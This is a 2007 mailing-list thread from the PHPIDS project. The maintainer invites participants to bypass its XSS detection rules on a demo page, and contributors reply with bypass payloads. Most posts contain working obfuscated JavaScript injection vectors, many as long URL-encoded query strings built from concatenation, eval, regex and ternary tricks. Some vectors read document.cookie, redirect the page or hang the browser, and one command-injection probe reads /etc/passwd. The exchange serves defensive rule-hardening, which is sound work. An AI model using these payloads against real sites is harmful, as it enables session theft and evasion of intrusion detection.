Pleeeease hack us!

[Mario Heiderich]

Hi!

After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spend lots of
time with the rules and except from some details we are pretty content
with them.

So if you like and find some time give them a new try - anyone who
will manage to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's interview will appear the next days - he was
again quicker than light with some vectors mentioned in the release
post).

Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+

Any vector which will be able to create an alert/content change via JS
on the demo page counts - as long as a PoC of what form ever can be
provided. A similar contest will follow the next weeks for SQL
Injection.

Greetings and have fun!
.mario

[Giorgio Maone]

http://hackademix.net/2007/09/04/phpids-threesome/

[Mario Heiderich]

Thanks Giorgio! Very classy ones again. *fixing*

2007/9/4, Giorgio Maone <giorgi...@gmail.com>:

http://hackademix.net/2007/09/04/phpids-threesome/

--
_______________________
php-ids.org

[Maie...@web.de]

Make Giorgios threesome a foursome.
obj[name]() works as well, giving access to all top level functions/
objects.
Low impact in general, but this might be combined with other things...

[Mario Heiderich]

Hi MalerMan and welcome to the group!
Nice variation - I shouldn't have forgotten that ;) *fixed*

Sorry for being late with answers today - I caught a cold and had to dig myself to a project although...

Greetings,
.mario

2007/9/5, Maie...@web.de <Maie...@web.de>:

[Gareth]

s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':
0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

Told you string concatenation was tough :)

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

[Gareth]

This will also work with the window.name trick (on IE only onclick):-

URL=name

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

[Gareth]

Now this is a strange one:-
h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':

0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':

0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;

It should work cause I tested it locally however it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
cause the onclick handler to produce invalid data. The code above get
pass your filters though,

Tested this is Firefox locally and it worked:-
<a
onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':

0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':

0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

[Mario Heiderich]

Yep - very nice and strange one indeed! But fixed. The concatenation algorithm has received a recode - hope that will stop the next wave ;)

Greetings and thanks!
.mario

2007/9/6, Gareth <gazh...@gmail.com>:

--
_______________________
php-ids.org

[Gareth]

Cool Mario nice one, I'll look forward to hacking it again :)

I think I might have found 1 vector already

On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Yep - very nice and strange one indeed! But fixed. The concatenation
> algorithm has received a recode - hope that will stop the next wave ;)
>
> Greetings and thanks!
> .mario
>

> 2007/9/6, Gareth <gazhe...@gmail.com>:

[Gareth]

s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1

[Mario Heiderich]

very cool and.. *fixed*

I sent you the questions, gareth. next would be kishor and giorgio if
you guys like to.

[Gareth]

x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/
+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]+s[10]+c
+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j

On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>

[Gareth]

c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;
(URL=a);

[thornmaker]

http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27%3B%62%3D%31%21%3D%31%3F%30%3A%27%61%27%3B%63%3D%31%21%3D%31%3F%30%3A%27%6C%27%3B%64%3D%61%2B%62%2B%63%3B%65%3D%31%21%3D%31%3F%30%3A%27%6C%6F%63%61%74%69%6F%27%3B%66%3D%31%21%3D%31%3F%30%3A%27%6E%2E%68%27%3B%67%3D%31%21%3D%31%3F%30%3A%27%73%68%2E%73%75%62%73%74%72%69%6E%27%3B%68%3D%31%21%3D%31%3F%30%3A%27%67%28%31%29%27%3B%69%3D%65%2B%66%2B%62%2B%67%2B%68%3B%30%5B%27%27%2B%28%64%29%5D%28%30%5B%27%27%2B%28%64%29%5D%28%69%29%29%3B#alert%28/a_rose_by_any_other_name/%29

[thornmaker]

here's another one using the "exec" function for regular expressions
to extract the strings to execute:
http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F%63%61%74%7E%69%6F%6E%2E%68%7E%61%73%68%2E%73%75%7E%62%73%74%72%69%6E%67%28%31%29%2F%3B%65%3D%2F%2E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%2E%2F%3B%66%3D%65%2E%65%78%65%63%28%64%29%3B%67%3D%66%5B%32%5D%3B%68%3D%66%5B%33%5D%3B%69%3D%66%5B%34%5D%3B%6A%3D%66%5B%35%5D%3B%6B%3D%67%2B%68%2B%69%2B%6A%3B%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%6B%29%29%3B#alert%280%29

On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...

[Mario Heiderich]

Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for being in the right format to  be executed.

2007/9/10, thornmaker <thorn...@gmail.com >:

php-ids.org

[Gareth]

Hi All

I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is need is because of the amount of possible
combinations and having a automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in you see.

Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip

On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:

>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>

> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...

>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>

> --
> _______________________
> php-ids.org

[Gareth]

Another thing I've thought about is Javascript based XSS protection, I
don't know if this is outside the projects goal but something like
this would prevent window.name exploits:-

<script type="text/javascript">window.name=''</script>

Which the PHPIDS could include in the header of the page.

[Mario Heiderich]

It's a good idea but it's way outside the project - the IDS will provide no protection - just monitoring and information on possible attacks. I had the PHPIPS idea in my head too for some time but there are so many other tools and ways to solve that...

2007/9/10, Gareth <gazh...@gmail.com>:

[thornmaker]

so here's a similar one but elimates the reg exp's... just pulls the
chars from the ''+/asdf/ directly.
http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

Mario: do you prefer these posted here or at sla.ckers or both?

On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:

>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>

> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...

>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>

> --
> _______________________
> php-ids.org

[Mario Heiderich]

Wow - I am impressed again ;) I'd prefer both variants of publishing if you don't mind. Great work, thornmaker!

Greetings,
.mario

2007/9/10, thornmaker < thorn...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

A few of my findings.

A redirect to google.

http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%3A%6C%65%2E%63%6D%2F%3B%68%3D%78%5B%30%2B%31%5D%3B%74%3D%78%5B%32%2B%31%5D%3B%70%3D%78%5B%34%2B%31%5D%3B%64%3D%78%5B%37%2B%31%5D%3B%73%3D%78%5B%31%2D%31%5D%3B%77%3D%78%5B%31%2B%31%5D%3B%70%31%3D%78%5B%33%2B%31%5D%3B%67%3D%78%5B%35%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6C%3D%78%5B%38%2B%31%5D%3B%65%3D%78%5B%39%2B%31%5D%3B%63%3D%78%5B%31%31%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6D%3D%78%5B%31%32%2B%31%5D%3B%75%3D%68%2B%74%2B%74%2B%70%2B%64%2B%73%2B%73%2B%77%2B%77%2B%77%2B%70%31%2B%67%2B%6F%2B%6F%2B%67%2B%6C%2B%65%2B%70%31%2B%63%2B%6F%2B%6D%2B%73%3B%6E%61%76%69%67%61%74%65%28%75%29%3B

If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediatly closes (close()).

The following two lock up the browser with 100% CPU activity.

http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

This is a opera specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);

On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:

>
>
>
>
>
>
>
> > so here's a similar one but elimates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>

> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...

[Mario Heiderich]

Hi xorrer and welcome!

Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?

Needless to say that the rules are *fixed* ;)

Thanks man!
.mario

On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> A few of my findings.
>
> A redirect to google.
>

> http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B

> the site opens and immediatly closes (close()).
>
> The following two lock up the browser with 100% CPU activity.
>

> http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

[thornmaker]

http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%2F%78%2F%3A%27%65%76%61%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%27%3B%61%3D%61%2B%62%3B%65%3D%31%21%3D%31%3F%2F%78%2F%3A%27%68%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%6F%63%61%74%69%6F%27%3B%63%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6E%27%3B%64%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%68%61%73%27%3B%68%3D%31%21%3D%31%3F%2F%78%2F%3A%27%31%29%27%3B%67%3D%31%21%3D%31%3F%2F%78%2F%3A%27%72%69%6E%67%28%30%27%3B%66%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%73%75%62%73%74%27%3B%62%3D%62%2B%63%2B%64%2B%65%2B%66%2B%67%2B%68%3B%42%3D%30%30%5B%27%27%2B%5B%61%5D%5D%28%62%29%3B%30%30%5B%27%27%2B%5B%61%5D%5D%28%42%29%3B#alert%280%29

On Aug 28, 3:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

[Andrei Savu]

All this is simply unbelievable. I am starting to think that this is an endless battle.

As I can see PHP IDS will help to make your website more secure but your
security problems will not end here, you will still need very good input filtering and
output escaping. Personally I don't think this kind of blacklist filtering is the answer
to this security problem.

I think that PHP IDS will give only a fake feeling of security. I am sure that it
will always be possible to find a new attack vector that is not already detected.

I will use PHP IDS because I am sure my scripts are not perfect and somewhere
there is a path that is not protected enough and someday someone will find it. By
using PHP IDS I hope I will limit most of attacks but I still consider that good input
filtering and output escaping is the only real solution.

I am amazed how many ways of injecting javascript in a page are.

--
'Discipline is the bridge between goals and accomplishments.' -Jim Rohn
"Set your goals high, and don't stop till you get there." Bo Jackson

[Gareth]

Check this one:-
_=alert,1,1,_(1);

Muhahahahahaha

On Sep 10, 11:10 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>

[Mario Heiderich]

Hi Andrej!

"I think that PHP IDS will give only a fake feeling of security. I am sure that it
will always be possible to find a new attack vector that is not already detected."

The PHPIDS shouldn't give you any feeling of security at all - it's no filter and no sanitizing mechanism. Like said on the start page it's able to tell you when someone is trying to attack your site and how he's doing it where. So it's a candy layer which definitely doesn't substitute responsible development. Most people using the PHPIDS use it on high traffic sites to be able to get some figures to ease risk assessment. The feedback we get from the sites using the PHPIDS is great and with any release we can cover more attacks and less false positives.

And yes - there will be no end regarding possible vectors and that's what makes the work with the PHPIDS so exciting.  I think and can speak for myself and others too that working on the PHPIDS is about learning what is possible, understanding XSS, SQL Injection etc. in very detail and widening ones scope what is possible today when talking about webapp security. It's definitely a 2.0 thing too (man I hate that term *g*) because we gather knowledge from people all over the world in this place and everybody who has information or time to contribute is more than welcome ;)

I hope my littler prayer didn't sound to pathetic but I just wanted to make sure what the PHPIDS is and what it's not. And yes - we will continue working on the patterns even if we all know that there will be no resulting software which is 100% bullet proof.


Greetings,
.mario

2007/9/11, Andrei Savu <savu....@gmail.com >:

--
_______________________
php-ids.org

[xorrer]

On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?

Well the only real source I know of is here
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier opera versions jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)

xorrer

On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
>
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>

[Mario Heiderich]

Thanks xorrer!

@Gareth: This one is evil. damn!

2007/9/11, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[Gareth]

:)

Dr Evil strikes again muwhahaahaha

I tried to create the smallest possible vector to see if it was
possible, this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.

On Sep 11, 12:33 pm, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> Thanks xorrer!
>
> @Gareth: This one is evil. damn!
>

> 2007/9/11, xorrer <obhvsbypqg...@gmail.com>:

>
>
>
>
>
> > On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
> > wrote:
> > > Nice stuff - I didn't know about the opera specific JS - is there a
> > > link to inform about that stuff?
>
> > Well the only real source I know of is here
> >http://www.howtocreate.co.uk/operaStuff/operaObject.html.
> > And a file once included with earlier opera versions jsconsole.html
> > (http://people.opera.com/byberg/jsconsole.html,

> >http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole...

[Mario Heiderich]

That's indeed DrEvilish - damn - this is working in dozens of combinations...

_=alert, 'a',1;_(1);

_=alert,
1,1;_(1);

_=alert, 1,
1
_(1);

_=alert, 'a',1   ,   _  (1);

Man - it's going to be really hard to find a pattern.

2007/9/11, Gareth <gazh...@gmail.com>:

--
_______________________
php-ids.org

[Gareth]

Sorry mate :)

It's unbelievable that javascript allows variables to be called just
'_' don't you think lol

I always say building things is a lot harder than breaking them ;)

On Sep 11, 12:59 pm, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> That's indeed DrEvilish - damn - this is working in dozens of
> combinations...
>
> _=alert, 'a',1;_(1);
>
> _=alert,
> 1,1;_(1);
>
> _=alert, 1,
> 1
> _(1);
>
> _=alert, 'a',1 , _ (1);
>
> Man - it's going to be really hard to find a pattern.
>

> 2007/9/11, Gareth <gazhe...@gmail.com>:

[thornmaker]

I like how the error page shows the vector in an input box now... but
could you make it a bit wider?

Also... I would like to test some of the path traversal injections but
am not for sure what would be considered 'passing'. For example...
http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
passwd in the right context, and you have filters that search for etc
and /etc/passwd outright, so I presume PHPIDS _should_ catch such
things...

[thornmaker]

http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28%7A%3D%7A%28%29%20%29%3B%7B%61%3D%28%31%21%3D%31%29%3F%61%3A%27%65%76%61%27%2B%7A%7D%7B%61%2B%3D%28%31%21%3D%31%29%3F%61%3A%27%6C%27%2B%7A%7D%7B%62%3D%28%31%21%3D%31%29%3F%62%3A%27%6C%6F%63%61%74%69%6F%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%6E%2E%68%61%73%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%68%2E%73%75%62%73%74%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%72%28%31%29%27%2B%7A%7D%7B%63%3D%28%31%21%3D%31%29%3F%63%3A%28%30%29%5B%61%5D%7D%7B%64%3D%63%28%62%29%7D%7B%63%28%64%29%7D#alert%28%27In%20all%20things%20it%20is%20a%20good%20idea%20to%20hang%20a%20question%20mark%20now%20and%20then%20on%20the%20things%20we%20have%20taken%20for%20granted.%20--%20Bertrand%20Russell%27%29

On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
> I like how the error page shows the vector in an input box now... but
> could you make it a bit wider?
>
> Also... I would like to test some of the path traversal injections but

> am not for sure what would be considered 'passing'. For example...http://demo.php-ids.org/?test=1;cat%20/e*c/p*dwill display /etc/

[Mario Heiderich]

@thornmaker: both of your last ones are fixed now. thanks man!

On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...

>
> On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
>
> > I like how the error page shows the vector in an input box now... but
> > could you make it a bit wider?
>
> > Also... I would like to test some of the path traversal injections but

> > am not for sure what would be considered 'passing'. For example...http://demo.php-ids.org/?test=1;cat%20/e*c/p*dwilldisplay /etc/

[thornmaker]

http://demo.php-ids.org/?test=%7B%7A%3D%28%31%3D%3D%34%29%3F%68%65%72%65%3A%7B%7A%3A%28%31%21%3D%35%29%3F%27%27%3A%62%65%7D%7D%7B%79%3D%28%39%3D%3D%32%29%3F%64%72%61%67%6F%6E%73%3A%7B%79%3A%27%6C%27%2B%7A%2E%7A%7D%7D%7B%78%3D%28%36%3D%3D%35%29%3F%33%3A%7B%78%3A%27%61%27%2B%79%2E%79%7D%7D%7B%77%3D%28%35%3D%3D%38%29%3F%39%3A%7B%77%3A%27%65%76%27%2B%78%2E%78%7D%7D%7B%76%3D%28%37%3D%3D%39%29%3F%33%3A%7B%76%3A%27%74%72%28%32%29%27%2B%7A%2E%7A%7D%7D%7B%75%3D%28%33%3D%3D%38%29%3F%34%3A%7B%75%3A%27%73%68%2E%73%75%62%73%27%2B%76%2E%76%7D%7D%7B%74%3D%28%36%3D%3D%32%29%3F%36%3A%7B%74%3A%79%2E%79%2B%27%6F%63%61%74%69%6F%6E%2E%68%61%27%2B%75%2E%75%7D%7D%7B%73%3D%28%34%3D%3D%33%29%3F%33%3A%7B%73%3A%28%38%21%3D%33%29%3F%28%32%29%5B%77%2E%77%5D%3A%7A%7D%7D%7B%72%3D%73%2E%73%28%74%2E%74%29%7D%7B%73%2E%73%28%72%29%2B%7A%2E%7A%7D#7alert%28%27boo%21%27%29

see http://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
for an explanation.

On Sep 10, 10:03 am, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:

>
>
>
>
>
> > so here's a similar one but elimates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>

> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...

[Mario Heiderich]

This is plain awesome - already commented on that one on slackers. Thanks, thornmaker!!!

2007/9/14, thornmaker <thorn...@gmail.com>:

--
_______________________
php-ids.org

[thornmaker]

similar to before:

http://demo.php-ids.org/?test=%7B%7A%3D%20%28%31%2E%3D%3D%34%2E%29%3F%68%65%72%65%3A%7B%7A%3A%20%28%31%2E%21%3D%35%2E%29%3F%27%27%3A%62%65%7D%7D%7B%79%3D%20%28%39%2E%3D%3D%32%2E%29%3F%64%72%61%67%6F%6E%73%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%7B%78%3D%20%28%36%2E%3D%3D%35%2E%29%3F%33%3A%7B%78%3A%20%27%61%27%2B%79%2E%79%7D%7D%7B%77%3D%20%28%35%2E%3D%3D%38%2E%29%3F%39%3A%7B%77%3A%20%27%65%76%27%2B%78%2E%78%7D%7D%7B%76%3D%20%28%37%2E%3D%3D%39%2E%29%3F%33%3A%7B%76%3A%20%27%74%72%28%32%2E%29%27%2B%7A%2E%7A%7D%7D%7B%75%3D%20%28%33%2E%3D%3D%38%2E%29%3F%34%3A%7B%75%3A%20%27%73%68%2E%73%75%62%73%27%2B%76%2E%76%7D%7D%7B%74%3D%20%28%36%2E%3D%3D%32%2E%29%3F%36%3A%7B%74%3A%20%79%2E%79%2B%27%6F%63%61%74%69%6F%6E%2E%68%61%27%2B%75%2E%75%7D%7D%7B%73%3D%20%28%34%2E%3D%3D%33%2E%29%3F%33%3A%7B%73%3A%20%28%38%2E%21%3D%33%2E%29%3F%28%32%2E%29%5B%77%2E%77%5D%3A%7A%7D%7D%7B%72%3D%20%73%2E%73%28%74%2E%74%29%7D%7B%73%2E%73%28%72%29%2B%7A%2E%7A%7D#7alert%28%27hi%20mom%21%27%29

On Sep 14, 4:39 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> This is plain awesome - already commented on that one on slackers. Thanks,
> thornmaker!!!
>

> 2007/9/14, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
> >http://demo.php-ids.org/?test=%7B%7A%3D%28%31%3D%3D%34%29%3F%68%65%72...
>
> > seehttp://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889

[Mario Heiderich]

Yep - I should have put more thought into the rule fixes. Thanks again!

2007/9/14, thornmaker <thorn...@gmail.com>:

--
_______________________
php-ids.org

[thornmaker]

I was looking at Kishord's new vector and when I submitted (a slight
variation of it) I got this funny error. I can't reproduce it now,
but thought I would mention it. See http://p42.us/php-ids/php-ids-error.png
for a screen shot.

[Mario Heiderich]

Hehe - you managed to catch a 15 second window when i uploaded a faulty file ;)

2007/9/15, thornmaker <thorn...@gmail.com>:

--
_______________________
php-ids.org

[thornmaker]

Shortly after that, I realized you were working on it live. First the
was blocked by one filter... a few minutes later it was blocked by
two :)

On Sep 14, 8:05 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Hehe - you managed to catch a 15 second window when i uploaded a faulty file
> ;)
>

> 2007/9/15, thornmaker <thornma...@gmail.com>:

[thornmaker]

a ternary operator based injection:
http://demo.php-ids.org/?test=%61%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F%27%27%3A%78%3A%78%3B%62%3D%31%3D%3D%31%3F%27%76%61%6C%27%2B%61%3A%78%3B%62%3D%31%3D%3D%31%3F%27%65%27%2B%62%3A%78%3B%63%3D%31%3D%3D%31%3F%27%73%74%72%28%31%29%27%2B%61%3A%78%3B%63%3D%31%3D%3D%31%3F%27%73%68%2E%73%75%62%27%2B%63%3A%78%3B%63%3D%31%3D%3D%31%3F%27%69%6F%6E%2E%68%61%27%2B%63%3A%78%3B%63%3D%31%3D%3D%31%3F%27%6C%6F%63%61%74%27%2B%63%3A%78%3B%64%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F%30%2E%5B%62%5D%3A%78%3A%78%3B%64%28%64%28%63%29%29#alert%28%27hells%20bells%27%29

[xorrer]

Displays cookie and the string XSS (based on thornmakers and kishords
work. thanks for the x='eval';n=0.[x] trick)

http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%6C%27%2B%7A%7D%3A%7B%79%3A%20%27%76%61%6C%27%2B%7A%2E%7A%7D%7D%78%3D%7A%2B%27%65%76%61%27%2B%7A%2B%27%6C%27%3B%6E%3D%30%2E%5B%78%5D%3B%6F%3D%7A%2B%27%58%53%53%27%3B%6D%3D%7A%2B%27%61%6C%65%72%27%2B%7A%2B%27%74%28%64%6F%63%75%6D%65%6E%27%2B%7A%2B%27%74%2E%63%6F%6F%6B%69%27%2B%7A%2B%27%65%2B%6F%29%27%3B%6E%28%6E%28%6D%29%29%3B

Just some other stuff, again tested on Opera. Nothing special just
something to mess up the page a little.

http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22%22%3A%61%2C%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%76%61%6C%27%2B%7A%7D%3A%7B%79%3A%20%27%76%61%6C%27%2B%7A%7D%7D%78%3D%27

http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F%64%65%28%74%72%75%65%29%3B

Btw. the last injections from thornmaker and kishord and the first of
mine above didn't execute on opera only in firefox.

Xorrer
On Sep 15, 6:00 am, thornmaker <thornma...@gmail.com> wrote:
